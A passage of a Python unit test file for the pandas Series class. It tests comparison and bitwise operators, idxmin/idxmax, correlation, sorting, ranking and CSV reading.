expected)\n\n def test_comparison_different_length(self):\n a = Series(['a', 'b', 'c'])\n b = Series(['b', 'a'])\n self.assertRaises(ValueError, a.__lt__, b)\n\n a = Series([1, 2])\n b = Series([2, 3, 4])\n self.assertRaises(ValueError, a.__eq__, b)\n\n def test_comparison_label_based(self):\n\n # GH 4947\n # comparisons should be label based\n\n a = Series([True, False, True], list('bca'))\n b = Series([False, True, False], list('abc'))\n\n expected = Series([True, False, False], list('bca'))\n result = a & b\n assert_series_equal(result,expected)\n\n expected = Series([True, False, True], list('bca'))\n result = a | b\n assert_series_equal(result,expected)\n\n expected = Series([False, False, True], list('bca'))\n result = a ^ b\n assert_series_equal(result,expected)\n\n # rhs is bigger\n a = Series([True, False, True], list('bca'))\n b = Series([False, True, False, True], list('abcd'))\n\n expected = Series([True, False, False], list('bca'))\n result = a & b\n assert_series_equal(result,expected)\n\n expected = Series([True, False, True], list('bca'))\n result = a | b\n assert_series_equal(result,expected)\n\n # filling\n\n # vs empty\n result = a & Series([])\n expected = Series([False, False, False], list('bca'))\n assert_series_equal(result,expected)\n\n result = a | Series([])\n expected = Series([True, False, True], list('bca'))\n assert_series_equal(result,expected)\n\n # vs non-matching\n result = a & Series([1],['z'])\n expected = Series([False, False, False], list('bca'))\n assert_series_equal(result,expected)\n\n result = a | Series([1],['z'])\n expected = Series([True, False, True], list('bca'))\n assert_series_equal(result,expected)\n\n # identity\n # we would like s[s|e] == s to hold for any e, whether empty or not\n for e in [Series([]),Series([1],['z']),Series(['z']),Series(np.nan,b.index),Series(np.nan,a.index)]:\n result = a[a | e]\n assert_series_equal(result,a[a])\n\n # vs scalars\n index = list('bca')\n t = Series([True,False,True])\n\n for v in [True,1,2]:\n result = Series([True,False,True],index=index) | v\n expected = Series([True,True,True],index=index)\n assert_series_equal(result,expected)\n\n for v in [np.nan,'foo']:\n self.assertRaises(TypeError, lambda : t | v)\n\n for v in [False,0]:\n result = Series([True,False,True],index=index) | v\n expected = Series([True,False,True],index=index)\n assert_series_equal(result,expected)\n\n for v in [True,1]:\n result = Series([True,False,True],index=index) & v\n expected = Series([True,False,True],index=index)\n assert_series_equal(result,expected)\n\n for v in [False,0]:\n result = Series([True,False,True],index=index) & v\n expected = Series([False,False,False],index=index)\n assert_series_equal(result,expected)\n for v in [np.nan]:\n self.assertRaises(TypeError, lambda : t & v)\n\n def test_operators_bitwise(self):\n # GH 9016: support bitwise op for integer types\n index = list('bca')\n\n s_tft = Series([True, False, True], index=index)\n s_fff = Series([False, False, False], index=index)\n s_tff = Series([True, False, False], index=index)\n s_empty = Series([])\n s_0101 = Series([0,1,0,1])\n s_0123 = Series(range(4),dtype='int64')\n s_3333 = Series([3] * 4)\n s_4444 = Series([4] * 4)\n\n res = s_tft & s_empty\n expected = s_fff\n assert_series_equal(res, expected)\n\n res = s_tft | s_empty\n expected = s_tft\n assert_series_equal(res, expected)\n\n res = s_0123 & s_3333\n expected = Series(range(4),dtype='int64')\n assert_series_equal(res, expected)\n\n res = s_0123 | s_4444\n expected = Series(range(4, 8),dtype='int64')\n assert_series_equal(res, expected)\n\n s_a0b1c0 = Series([1], list('b'))\n\n res = s_tft & s_a0b1c0\n expected = s_tff\n assert_series_equal(res, expected)\n\n res = s_tft | s_a0b1c0\n expected = s_tft\n assert_series_equal(res, expected)\n\n n0 = 0\n res = s_tft & n0\n expected = s_fff\n assert_series_equal(res, expected)\n\n res = s_0123 & n0\n expected = Series([0] * 4)\n assert_series_equal(res, expected)\n\n n1 = 1\n res = s_tft & n1\n expected = s_tft\n assert_series_equal(res, expected)\n\n res = s_0123 & n1\n expected = Series([0, 1, 0, 1])\n assert_series_equal(res, expected)\n\n s_1111 = Series([1]*4, dtype='int8')\n res = s_0123 & s_1111\n expected = Series([0, 1, 0, 1], dtype='int64')\n assert_series_equal(res, expected)\n\n res = s_0123.astype(np.int16) | s_1111.astype(np.int32)\n expected = Series([1, 1, 3, 3], dtype='int32')\n assert_series_equal(res, expected)\n\n self.assertRaises(TypeError, lambda: s_1111 & 'a')\n self.assertRaises(TypeError, lambda: s_1111 & ['a','b','c','d'])\n self.assertRaises(TypeError, lambda: s_0123 & np.NaN)\n self.assertRaises(TypeError, lambda: s_0123 & 3.14)\n self.assertRaises(TypeError, lambda: s_0123 & [0.1, 4, 3.14, 2])\n\n # s_0123 will be all false now because of reindexing like s_tft\n assert_series_equal(s_tft & s_0123, Series([False] * 3, list('bca')))\n # s_tft will be all false now because of reindexing like s_0123\n assert_series_equal(s_0123 & s_tft, Series([False] * 4))\n assert_series_equal(s_0123 & False, Series([False] * 4))\n assert_series_equal(s_0123 ^ False, Series([False, True, True, True]))\n assert_series_equal(s_0123 & [False], Series([False] * 4))\n assert_series_equal(s_0123 & (False), Series([False] * 4))\n assert_series_equal(s_0123 & Series([False, np.NaN, False, False]), Series([False] * 4))\n\n s_ftft = Series([False, True, False, True])\n assert_series_equal(s_0123 & Series([0.1, 4, -3.14, 2]), s_ftft)\n\n s_abNd = Series(['a','b',np.NaN,'d'])\n res = s_0123 & s_abNd\n expected = s_ftft\n assert_series_equal(res, expected)\n\n def test_between(self):\n s = Series(bdate_range('1/1/2000', periods=20).asobject)\n s[::2] = np.nan\n\n result = s[s.between(s[3], s[17])]\n expected = s[3:18].dropna()\n assert_series_equal(result, expected)\n\n result = s[s.between(s[3], s[17], inclusive=False)]\n expected = s[5:16].dropna()\n assert_series_equal(result, expected)\n\n def test_setitem_na(self):\n # these induce dtype changes\n expected = Series([np.nan, 3, np.nan, 5, np.nan, 7, np.nan, 9, np.nan])\n s = Series([2, 3, 4, 5, 6, 7, 8, 9, 10])\n s[::2] = np.nan\n assert_series_equal(s, expected)\n\n # get's coerced to float, right?\n expected = Series([np.nan, 1, np.nan, 0])\n s = Series([True, True, False, False])\n s[::2] = np.nan\n assert_series_equal(s, expected)\n\n expected = Series([np.nan, np.nan, np.nan, np.nan, np.nan, 5, 6, 7, 8, 9])\n s = Series(np.arange(10))\n s[:5] = np.nan\n assert_series_equal(s, expected)\n\n def test_scalar_na_cmp_corners(self):\n s = Series([2, 3, 4, 5, 6, 7, 8, 9, 10])\n\n def tester(a, b):\n return a & b\n\n self.assertRaises(TypeError, tester, s, datetime(2005, 1, 1))\n\n s = Series([2, 3, 4, 5, 6, 7, 8, 9, datetime(2005, 1, 1)])\n s[::2] = np.nan\n\n expected = Series(True,index=s.index)\n expected[::2] = False\n assert_series_equal(tester(s, list(s)), expected)\n\n d = DataFrame({'A': s})\n # TODO: Fix this exception - needs to be fixed! (see GH5035)\n # (previously this was a TypeError because series returned\n # NotImplemented\n self.assertRaises(ValueError, tester, s, d)\n\n def test_idxmin(self):\n # test idxmin\n # _check_stat_op approach can not be used here because of isnull check.\n\n # add some NaNs\n self.series[5:15] = np.NaN\n\n # skipna or no\n self.assertEqual(self.series[self.series.idxmin()], self.series.min())\n self.assertTrue(isnull(self.series.idxmin(skipna=False)))\n\n # no NaNs\n nona = self.series.dropna()\n self.assertEqual(nona[nona.idxmin()], nona.min())\n self.assertEqual(nona.index.values.tolist().index(nona.idxmin()),\n nona.values.argmin())\n\n # all NaNs\n allna = self.series * nan\n self.assertTrue(isnull(allna.idxmin()))\n\n # datetime64[ns]\n from pandas import date_range\n s = Series(date_range('20130102', periods=6))\n result = s.idxmin()\n self.assertEqual(result, 0)\n\n s[0] = np.nan\n result = s.idxmin()\n self.assertEqual(result, 1)\n\n def test_idxmax(self):\n # test idxmax\n # _check_stat_op approach can not be used here because of isnull check.\n\n # add some NaNs\n self.series[5:15] = np.NaN\n\n # skipna or no\n self.assertEqual(self.series[self.series.idxmax()], self.series.max())\n self.assertTrue(isnull(self.series.idxmax(skipna=False)))\n\n # no NaNs\n nona = self.series.dropna()\n self.assertEqual(nona[nona.idxmax()], nona.max())\n self.assertEqual(nona.index.values.tolist().index(nona.idxmax()),\n nona.values.argmax())\n\n # all NaNs\n allna = self.series * nan\n self.assertTrue(isnull(allna.idxmax()))\n\n from pandas import date_range\n s = Series(date_range('20130102', periods=6))\n result = s.idxmax()\n self.assertEqual(result, 5)\n\n s[5] = np.nan\n result = s.idxmax()\n self.assertEqual(result, 4)\n\n # Float64Index\n # GH 5914\n s = pd.Series([1,2,3],[1.1,2.1,3.1])\n result = s.idxmax()\n self.assertEqual(result, 3.1)\n result = s.idxmin()\n self.assertEqual(result, 1.1)\n\n s = pd.Series(s.index, s.index)\n result = s.idxmax()\n self.assertEqual(result, 3.1)\n result = s.idxmin()\n self.assertEqual(result, 1.1)\n\n def test_ndarray_compat(self):\n\n # test numpy compat with Series as sub-class of NDFrame\n tsdf = DataFrame(np.random.randn(1000, 3), columns=['A', 'B', 'C'],\n index=date_range('1/1/2000', periods=1000))\n\n def f(x):\n return x[x.argmax()]\n result = tsdf.apply(f)\n expected = tsdf.max()\n assert_series_equal(result,expected)\n\n # .item()\n s = Series([1])\n result = s.item()\n self.assertEqual(result, 1)\n self.assertEqual(s.item(), s.iloc[0])\n\n # using an ndarray like function\n s = Series(np.random.randn(10))\n result = np.ones_like(s)\n expected = Series(1,index=range(10),dtype='float64')\n #assert_series_equal(result,expected)\n\n # ravel\n s = Series(np.random.randn(10))\n tm.assert_almost_equal(s.ravel(order='F'),s.values.ravel(order='F'))\n\n # compress\n # GH 6658\n s = Series([0,1.,-1],index=list('abc'))\n result = np.compress(s>0,s)\n assert_series_equal(result, Series([1.],index=['b']))\n\n result = np.compress(s<-1,s)\n assert_series_equal(result, Series([],dtype='float64'))\n\n def test_complexx(self):\n\n # GH4819\n # complex access for ndarray compat\n a = np.arange(5)\n b = Series(a + 4j*a)\n tm.assert_almost_equal(a,b.real)\n tm.assert_almost_equal(4*a,b.imag)\n\n b.real = np.arange(5)+5\n tm.assert_almost_equal(a+5,b.real)\n tm.assert_almost_equal(4*a,b.imag)\n\n def test_underlying_data_conversion(self):\n\n # GH 4080\n df = DataFrame(dict((c, [1,2,3]) for c in ['a', 'b', 'c']))\n df.set_index(['a', 'b', 'c'], inplace=True)\n s = Series([1], index=[(2,2,2)])\n df['val'] = 0\n df\n df['val'].update(s)\n\n expected = DataFrame(dict(a = [1,2,3], b = [1,2,3], c = [1,2,3], val = [0,1,0]))\n expected.set_index(['a', 'b', 'c'], inplace=True)\n tm.assert_frame_equal(df,expected)\n\n # GH 3970\n # these are chained assignments as well\n pd.set_option('chained_assignment',None)\n df = DataFrame({ \"aa\":range(5), \"bb\":[2.2]*5})\n df[\"cc\"] = 0.0\n ck = [True]*len(df)\n df[\"bb\"].iloc[0] = .13\n df_tmp = df.iloc[ck]\n df[\"bb\"].iloc[0] = .15\n self.assertEqual(df['bb'].iloc[0], 0.15)\n pd.set_option('chained_assignment','raise')\n\n # GH 3217\n df = DataFrame(dict(a = [1,3], b = [np.nan, 2]))\n df['c'] = np.nan\n df['c'].update(pd.Series(['foo'],index=[0]))\n\n expected = DataFrame(dict(a = [1,3], b = [np.nan, 2], c = ['foo',np.nan]))\n tm.assert_frame_equal(df,expected)\n\n def test_operators_corner(self):\n series = self.ts\n\n empty = Series([], index=Index([]))\n\n result = series + empty\n self.assertTrue(np.isnan(result).all())\n\n result = empty + Series([], index=Index([]))\n self.assertEqual(len(result), 0)\n\n # TODO: this returned NotImplemented earlier, what to do?\n # deltas = Series([timedelta(1)] * 5, index=np.arange(5))\n # sub_deltas = deltas[::2]\n # deltas5 = deltas * 5\n # deltas = deltas + sub_deltas\n\n # float + int\n int_ts = self.ts.astype(int)[:-5]\n added = self.ts + int_ts\n expected = self.ts.values[:-5] + int_ts.values\n self.assert_numpy_array_equal(added[:-5], expected)\n\n def test_operators_reverse_object(self):\n # GH 56\n arr = Series(np.random.randn(10), index=np.arange(10),\n dtype=object)\n\n def _check_op(arr, op):\n result = op(1., arr)\n expected = op(1., arr.astype(float))\n assert_series_equal(result.astype(float), expected)\n\n _check_op(arr, operator.add)\n _check_op(arr, operator.sub)\n _check_op(arr, operator.mul)\n _check_op(arr, operator.truediv)\n _check_op(arr, operator.floordiv)\n\n def test_series_frame_radd_bug(self):\n import operator\n\n # GH 353\n vals = Series(tm.rands_array(5, 10))\n result = 'foo_' + vals\n expected = vals.map(lambda x: 'foo_' + x)\n assert_series_equal(result, expected)\n\n frame = DataFrame({'vals': vals})\n result = 'foo_' + frame\n expected = DataFrame({'vals': vals.map(lambda x: 'foo_' + x)})\n tm.assert_frame_equal(result, expected)\n\n # really raise this time\n self.assertRaises(TypeError, operator.add, datetime.now(), self.ts)\n\n def test_operators_frame(self):\n # rpow does not work with DataFrame\n df = DataFrame({'A': self.ts})\n\n tm.assert_almost_equal(self.ts + self.ts, (self.ts + df)['A'])\n tm.assert_almost_equal(self.ts ** self.ts, (self.ts ** df)['A'])\n tm.assert_almost_equal(self.ts < self.ts, (self.ts < df)['A'])\n tm.assert_almost_equal(self.ts / self.ts, (self.ts / df)['A'])\n\n def test_operators_combine(self):\n def _check_fill(meth, op, a, b, fill_value=0):\n exp_index = a.index.union(b.index)\n a = a.reindex(exp_index)\n b = b.reindex(exp_index)\n\n amask = isnull(a)\n bmask = isnull(b)\n\n exp_values = []\n for i in range(len(exp_index)):\n if amask[i]:\n if bmask[i]:\n exp_values.append(nan)\n continue\n exp_values.append(op(fill_value, b[i]))\n elif bmask[i]:\n if amask[i]:\n exp_values.append(nan)\n continue\n exp_values.append(op(a[i], fill_value))\n else:\n exp_values.append(op(a[i], b[i]))\n\n result = meth(a, b, fill_value=fill_value)\n expected = Series(exp_values, exp_index)\n assert_series_equal(result, expected)\n\n a = Series([nan, 1., 2., 3., nan], index=np.arange(5))\n b = Series([nan, 1, nan, 3, nan, 4.], index=np.arange(6))\n\n pairings = []\n for op in ['add', 'sub', 'mul', 'pow', 'truediv', 'floordiv']:\n fv = 0\n lop = getattr(Series, op)\n lequiv = getattr(operator, op)\n rop = getattr(Series, 'r' + op)\n # bind op at definition time...\n requiv = lambda x, y, op=op: getattr(operator, op)(y, x)\n pairings.append((lop, lequiv, fv))\n pairings.append((rop, requiv, fv))\n\n if compat.PY3:\n pairings.append((Series.div, operator.truediv, 1))\n pairings.append((Series.rdiv, lambda x, y: operator.truediv(y, x), 1))\n else:\n pairings.append((Series.div, operator.div, 1))\n pairings.append((Series.rdiv, lambda x, y: operator.div(y, x), 1))\n\n for op, equiv_op, fv in pairings:\n result = op(a, b)\n exp = equiv_op(a, b)\n assert_series_equal(result, exp)\n _check_fill(op, equiv_op, a, b, fill_value=fv)\n # should accept axis=0 or axis='rows'\n op(a, b, axis=0)\n\n def test_combine_first(self):\n values = tm.makeIntIndex(20).values.astype(float)\n series = Series(values, index=tm.makeIntIndex(20))\n\n series_copy = series * 2\n series_copy[::2] = np.NaN\n\n # nothing used from the input\n combined = series.combine_first(series_copy)\n\n self.assert_numpy_array_equal(combined, series)\n\n # Holes filled from input\n combined = series_copy.combine_first(series)\n self.assertTrue(np.isfinite(combined).all())\n\n self.assert_numpy_array_equal(combined[::2], series[::2])\n self.assert_numpy_array_equal(combined[1::2], series_copy[1::2])\n\n # mixed types\n index = tm.makeStringIndex(20)\n floats = Series(tm.randn(20), index=index)\n strings = Series(tm.makeStringIndex(10), index=index[::2])\n\n combined = strings.combine_first(floats)\n\n tm.assert_dict_equal(strings, combined, compare_keys=False)\n tm.assert_dict_equal(floats[1::2], combined, compare_keys=False)\n\n # corner case\n s = Series([1., 2, 3], index=[0, 1, 2])\n result = s.combine_first(Series([], index=[]))\n assert_series_equal(s, result)\n\n def test_update(self):\n s = Series([1.5, nan, 3., 4., nan])\n s2 = Series([nan, 3.5, nan, 5.])\n s.update(s2)\n\n expected = Series([1.5, 3.5, 3., 5., np.nan])\n assert_series_equal(s, expected)\n\n # GH 3217\n df = DataFrame([{\"a\": 1}, {\"a\": 3, \"b\": 2}])\n df['c'] = np.nan\n\n # this will fail as long as series is a sub-class of ndarray\n # df['c'].update(Series(['foo'],index=[0])) #####\n\n def test_corr(self):\n tm._skip_if_no_scipy()\n\n import scipy.stats as stats\n\n # full overlap\n self.assertAlmostEqual(self.ts.corr(self.ts), 1)\n\n # partial overlap\n self.assertAlmostEqual(self.ts[:15].corr(self.ts[5:]), 1)\n\n self.assertTrue(isnull(self.ts[:15].corr(self.ts[5:], min_periods=12)))\n\n ts1 = self.ts[:15].reindex(self.ts.index)\n ts2 = self.ts[5:].reindex(self.ts.index)\n self.assertTrue(isnull(ts1.corr(ts2, min_periods=12)))\n\n # No overlap\n self.assertTrue(np.isnan(self.ts[::2].corr(self.ts[1::2])))\n\n # all NA\n cp = self.ts[:10].copy()\n cp[:] = np.nan\n self.assertTrue(isnull(cp.corr(cp)))\n\n A = tm.makeTimeSeries()\n B = tm.makeTimeSeries()\n result = A.corr(B)\n expected, _ = stats.pearsonr(A, B)\n self.assertAlmostEqual(result, expected)\n\n def test_corr_rank(self):\n tm._skip_if_no_scipy()\n\n import scipy\n import scipy.stats as stats\n\n # kendall and spearman\n A = tm.makeTimeSeries()\n B = tm.makeTimeSeries()\n A[-5:] = A[:5]\n result = A.corr(B, method='kendall')\n expected = stats.kendalltau(A, B)[0]\n self.assertAlmostEqual(result, expected)\n\n result = A.corr(B, method='spearman')\n expected = stats.spearmanr(A, B)[0]\n self.assertAlmostEqual(result, expected)\n\n # these methods got rewritten in 0.8\n if scipy.__version__ < LooseVersion('0.9'):\n raise nose.SkipTest(\"skipping corr rank because of scipy version \"\n \"{0}\".format(scipy.__version__))\n\n # results from R\n A = Series([-0.89926396, 0.94209606, -1.03289164, -0.95445587,\n 0.76910310, -0.06430576, -2.09704447, 0.40660407,\n -0.89926396, 0.94209606])\n B = Series([-1.01270225, -0.62210117, -1.56895827, 0.59592943,\n -0.01680292, 1.17258718, -1.06009347, -0.10222060,\n -0.89076239, 0.89372375])\n kexp = 0.4319297\n sexp = 0.5853767\n self.assertAlmostEqual(A.corr(B, method='kendall'), kexp)\n self.assertAlmostEqual(A.corr(B, method='spearman'), sexp)\n\n def test_cov(self):\n # full overlap\n self.assertAlmostEqual(self.ts.cov(self.ts), self.ts.std() ** 2)\n\n # partial overlap\n self.assertAlmostEqual(\n self.ts[:15].cov(self.ts[5:]), self.ts[5:15].std() ** 2)\n\n # No overlap\n self.assertTrue(np.isnan(self.ts[::2].cov(self.ts[1::2])))\n\n # all NA\n cp = self.ts[:10].copy()\n cp[:] = np.nan\n self.assertTrue(isnull(cp.cov(cp)))\n\n # min_periods\n self.assertTrue(isnull(self.ts[:15].cov(self.ts[5:], min_periods=12)))\n\n ts1 = self.ts[:15].reindex(self.ts.index)\n ts2 = self.ts[5:].reindex(self.ts.index)\n self.assertTrue(isnull(ts1.cov(ts2, min_periods=12)))\n\n def test_copy(self):\n ts = self.ts.copy()\n\n ts[::2] = np.NaN\n\n # Did not modify original Series\n self.assertFalse(np.isnan(self.ts[0]))\n\n def test_count(self):\n self.assertEqual(self.ts.count(), len(self.ts))\n\n self.ts[::2] = np.NaN\n\n self.assertEqual(self.ts.count(), np.isfinite(self.ts).sum())\n\n def test_dtype(self):\n\n self.assertEqual(self.ts.dtype, np.dtype('float64'))\n self.assertEqual(self.ts.dtypes, np.dtype('float64'))\n self.assertEqual(self.ts.ftype, 'float64:dense')\n self.assertEqual(self.ts.ftypes, 'float64:dense')\n assert_series_equal(self.ts.get_dtype_counts(),Series(1,['float64']))\n assert_series_equal(self.ts.get_ftype_counts(),Series(1,['float64:dense']))\n\n def test_dot(self):\n a = Series(np.random.randn(4), index=['p', 'q', 'r', 's'])\n b = DataFrame(np.random.randn(3, 4), index=['1', '2', '3'],\n columns=['p', 'q', 'r', 's']).T\n\n result = a.dot(b)\n expected = Series(np.dot(a.values, b.values),\n index=['1', '2', '3'])\n assert_series_equal(result, expected)\n\n # Check index alignment\n b2 = b.reindex(index=reversed(b.index))\n result = a.dot(b)\n assert_series_equal(result, expected)\n\n # Check ndarray argument\n result = a.dot(b.values)\n self.assertTrue(np.all(result == expected.values))\n assert_almost_equal(a.dot(b['2'].values), expected['2'])\n\n # Check series argument\n assert_almost_equal(a.dot(b['1']), expected['1'])\n assert_almost_equal(a.dot(b2['1']), expected['1'])\n\n self.assertRaises(Exception, a.dot, a.values[:3])\n self.assertRaises(ValueError, a.dot, b.T)\n\n def test_value_counts_nunique(self):\n\n # basics.rst doc example\n series = Series(np.random.randn(500))\n series[20:500] = np.nan\n series[10:20] = 5000\n result = series.nunique()\n self.assertEqual(result, 11)\n\n def test_unique(self):\n\n # 714 also, dtype=float\n s = Series([1.2345] * 100)\n s[::2] = np.nan\n result = s.unique()\n self.assertEqual(len(result), 2)\n\n s = Series([1.2345] * 100, dtype='f4')\n s[::2] = np.nan\n result = s.unique()\n self.assertEqual(len(result), 2)\n\n # NAs in object arrays #714\n s = Series(['foo'] * 100, dtype='O')\n s[::2] = np.nan\n result = s.unique()\n self.assertEqual(len(result), 2)\n\n # decision about None\n s = Series([1, 2, 3, None, None, None], dtype=object)\n result = s.unique()\n expected = np.array([1, 2, 3, None], dtype=object)\n self.assert_numpy_array_equal(result, expected)\n\n def test_dropna_empty(self):\n s = Series([])\n self.assertEqual(len(s.dropna()), 0)\n s.dropna(inplace=True)\n self.assertEqual(len(s), 0)\n\n # invalid axis\n self.assertRaises(ValueError, s.dropna, axis=1)\n\n def test_axis_alias(self):\n s = Series([1, 2, np.nan])\n assert_series_equal(s.dropna(axis='rows'), s.dropna(axis='index'))\n self.assertEqual(s.dropna().sum('rows'), 3)\n self.assertEqual(s._get_axis_number('rows'), 0)\n self.assertEqual(s._get_axis_name('rows'), 'index')\n\n def test_drop_duplicates(self):\n s = Series([1, 2, 3, 3])\n\n result = s.duplicated()\n expected = Series([False, False, False, True])\n assert_series_equal(result, expected)\n\n result = s.duplicated(take_last=True)\n expected = Series([False, False, True, False])\n assert_series_equal(result, expected)\n\n result = s.drop_duplicates()\n expected = s[[True, True, True, False]]\n assert_series_equal(result, expected)\n sc = s.copy()\n sc.drop_duplicates(inplace=True)\n assert_series_equal(sc, expected)\n\n result = s.drop_duplicates(take_last=True)\n expected = s[[True, True, False, True]]\n assert_series_equal(result, expected)\n sc = s.copy()\n sc.drop_duplicates(take_last=True, inplace=True)\n assert_series_equal(sc, expected)\n\n def test_sort(self):\n ts = self.ts.copy()\n ts.sort()\n\n self.assert_numpy_array_equal(ts, self.ts.order())\n self.assert_numpy_array_equal(ts.index, self.ts.order().index)\n\n ts.sort(ascending=False)\n self.assert_numpy_array_equal(ts, self.ts.order(ascending=False))\n self.assert_numpy_array_equal(ts.index,\n self.ts.order(ascending=False).index)\n\n # GH 5856/5853\n # Series.sort operating on a view\n df = DataFrame(np.random.randn(10,4))\n s = df.iloc[:,0]\n def f():\n s.sort()\n self.assertRaises(ValueError, f)\n\n # test order/sort inplace\n # GH6859\n ts1 = self.ts.copy()\n ts1.sort(ascending=False)\n ts2 = self.ts.copy()\n ts2.order(ascending=False,inplace=True)\n assert_series_equal(ts1,ts2)\n\n ts1 = self.ts.copy()\n ts1 = ts1.sort(ascending=False,inplace=False)\n ts2 = self.ts.copy()\n ts2 = ts.order(ascending=False)\n assert_series_equal(ts1,ts2)\n\n def test_sort_index(self):\n import random\n\n rindex = list(self.ts.index)\n random.shuffle(rindex)\n\n random_order = self.ts.reindex(rindex)\n sorted_series = random_order.sort_index()\n assert_series_equal(sorted_series, self.ts)\n\n # descending\n sorted_series = random_order.sort_index(ascending=False)\n assert_series_equal(sorted_series,\n self.ts.reindex(self.ts.index[::-1]))\n\n def test_order(self):\n ts = self.ts.copy()\n ts[:5] = np.NaN\n vals = ts.values\n\n result = ts.order()\n self.assertTrue(np.isnan(result[-5:]).all())\n self.assert_numpy_array_equal(result[:-5], np.sort(vals[5:]))\n\n result = ts.order(na_position='first')\n self.assertTrue(np.isnan(result[:5]).all())\n self.assert_numpy_array_equal(result[5:], np.sort(vals[5:]))\n\n # something object-type\n ser = Series(['A', 'B'], [1, 2])\n # no failure\n ser.order()\n\n # ascending=False\n ordered = ts.order(ascending=False)\n expected = np.sort(ts.valid().values)[::-1]\n assert_almost_equal(expected, ordered.valid().values)\n ordered = ts.order(ascending=False, na_position='first')\n assert_almost_equal(expected, ordered.valid().values)\n\n def test_nsmallest_nlargest(self):\n # float, int, datetime64 (use i8), timedelts64 (same),\n # object that are numbers, object that are strings\n\n base = [3, 2, 1, 2, 5]\n\n s_list = [\n Series(base, dtype='int8'),\n Series(base, dtype='int16'),\n Series(base, dtype='int32'),\n Series(base, dtype='int64'),\n Series(base, dtype='float32'),\n Series(base, dtype='float64'),\n Series(base, dtype='uint8'),\n Series(base, dtype='uint16'),\n Series(base, dtype='uint32'),\n Series(base, dtype='uint64'),\n Series(base).astype('timedelta64[ns]'),\n Series(pd.to_datetime(['2003', '2002', '2001', '2002', '2005'])),\n ]\n\n raising = [\n Series([3., 2, 1, 2, '5'], dtype='object'),\n Series([3., 2, 1, 2, 5], dtype='object'),\n # not supported on some archs\n # Series([3., 2, 1, 2, 5], dtype='complex256'),\n Series([3., 2, 1, 2, 5], dtype='complex128'),\n ]\n\n for r in raising:\n dt = r.dtype\n msg = \"Cannot use method 'n(larg|small)est' with dtype %s\" % dt\n args = 2, len(r), 0, -1\n methods = r.nlargest, r.nsmallest\n for method, arg in product(methods, args):\n with tm.assertRaisesRegexp(TypeError, msg):\n method(arg)\n\n for s in s_list:\n\n assert_series_equal(s.nsmallest(2), s.iloc[[2, 1]])\n assert_series_equal(s.nsmallest(2, take_last=True), s.iloc[[2, 3]])\n\n assert_series_equal(s.nlargest(3), s.iloc[[4, 0, 1]])\n assert_series_equal(s.nlargest(3, take_last=True),\n s.iloc[[4, 0, 3]])\n\n empty = s.iloc[0:0]\n assert_series_equal(s.nsmallest(0), empty)\n assert_series_equal(s.nsmallest(-1), empty)\n assert_series_equal(s.nlargest(0), empty)\n assert_series_equal(s.nlargest(-1), empty)\n\n assert_series_equal(s.nsmallest(len(s)), s.order())\n assert_series_equal(s.nsmallest(len(s) + 1), s.order())\n assert_series_equal(s.nlargest(len(s)), s.iloc[[4, 0, 1, 3, 2]])\n assert_series_equal(s.nlargest(len(s) + 1),\n s.iloc[[4, 0, 1, 3, 2]])\n\n s = Series([3., np.nan, 1, 2, 5])\n assert_series_equal(s.nlargest(), s.iloc[[4, 0, 3, 2]])\n assert_series_equal(s.nsmallest(), s.iloc[[2, 3, 0, 4]])\n\n def test_rank(self):\n tm._skip_if_no_scipy()\n from scipy.stats import rankdata\n\n self.ts[::2] = np.nan\n self.ts[:10][::3] = 4.\n\n ranks = self.ts.rank()\n oranks = self.ts.astype('O').rank()\n\n assert_series_equal(ranks, oranks)\n\n mask = np.isnan(self.ts)\n filled = self.ts.fillna(np.inf)\n\n # rankdata returns a ndarray\n exp = Series(rankdata(filled),index=filled.index)\n exp[mask] = np.nan\n\n assert_almost_equal(ranks, exp)\n\n iseries = Series(np.arange(5).repeat(2))\n\n iranks = iseries.rank()\n exp = iseries.astype(float).rank()\n assert_series_equal(iranks, exp)\n iseries = Series(np.arange(5)) + 1.0\n exp = iseries / 5.0\n iranks = iseries.rank(pct=True)\n\n assert_series_equal(iranks, exp)\n\n iseries = Series(np.repeat(1, 100))\n exp = Series(np.repeat(0.505, 100))\n iranks = iseries.rank(pct=True)\n assert_series_equal(iranks, exp)\n\n iseries[1] = np.nan\n exp = Series(np.repeat(50.0 / 99.0, 100))\n exp[1] = np.nan\n iranks = iseries.rank(pct=True)\n assert_series_equal(iranks, exp)\n\n iseries = Series(np.arange(5)) + 1.0\n iseries[4] = np.nan\n exp = iseries / 4.0\n iranks = iseries.rank(pct=True)\n assert_series_equal(iranks, exp)\n\n iseries = Series(np.repeat(np.nan, 100))\n exp = iseries.copy()\n iranks = iseries.rank(pct=True)\n assert_series_equal(iranks, exp)\n\n iseries = Series(np.arange(5)) + 1\n iseries[4] = np.nan\n exp = iseries / 4.0\n iranks = iseries.rank(pct=True)\n assert_series_equal(iranks, exp)\n\n rng = date_range('1/1/1990', periods=5)\n iseries = Series(np.arange(5), rng) + 1\n iseries.ix[4] = np.nan\n exp = iseries / 4.0\n iranks = iseries.rank(pct=True)\n assert_series_equal(iranks, exp)\n\n iseries = Series([1e-50, 1e-100, 1e-20, 1e-2, 1e-20+1e-30, 1e-1])\n exp = Series([2, 1, 3.5, 5, 3.5, 6])\n iranks = iseries.rank()\n assert_series_equal(iranks, exp)\n\n values = np.array([-50, -1, -1e-20, -1e-25, -1e-50, 0, 1e-40, 1e-20, 1e-10, 2, 40], dtype='float64')\n random_order = np.random.permutation(len(values))\n iseries = Series(values[random_order])\n exp = Series(random_order + 1.0, dtype='float64')\n iranks = iseries.rank()\n assert_series_equal(iranks, exp)\n\n def test_rank_inf(self):\n raise nose.SkipTest('DataFrame.rank does not currently rank np.inf and -np.inf properly')\n\n values = np.array([-np.inf, -50, -1, -1e-20, -1e-25, -1e-50, 0, 1e-40, 1e-20, 1e-10, 2, 40, np.inf], dtype='float64')\n random_order = np.random.permutation(len(values))\n iseries = Series(values[random_order])\n exp = Series(random_order + 1.0, dtype='float64')\n iranks = iseries.rank()\n assert_series_equal(iranks, exp)\n\n\n def test_from_csv(self):\n\n with ensure_clean() as path:\n self.ts.to_csv(path)\n ts = Series.from_csv(path)\n assert_series_equal(self.ts, ts)\n self.assertTrue(ts.index.name is None)\n\n self.series.to_csv(path)\n series = Series.from_csv(path)\n self.assertIsNone(series.name)\n self.assertIsNone(series.index.name)\n assert_series_equal(self.series, series)\n\n outfile = open(path, 'w')\n outfile.write('1998-01-01|1.0\\n1999-01-01|2.0')\n outfile.close()\n series = Series.from_csv(path, sep='|')\n checkseries = Series(\n {datetime(1998, 1, 1): 1.0, datetime(1999, 1, 1): 2.0})\n assert_series_equal(checkseries, series)\n\n series = Series.from_csv(path, sep='|', 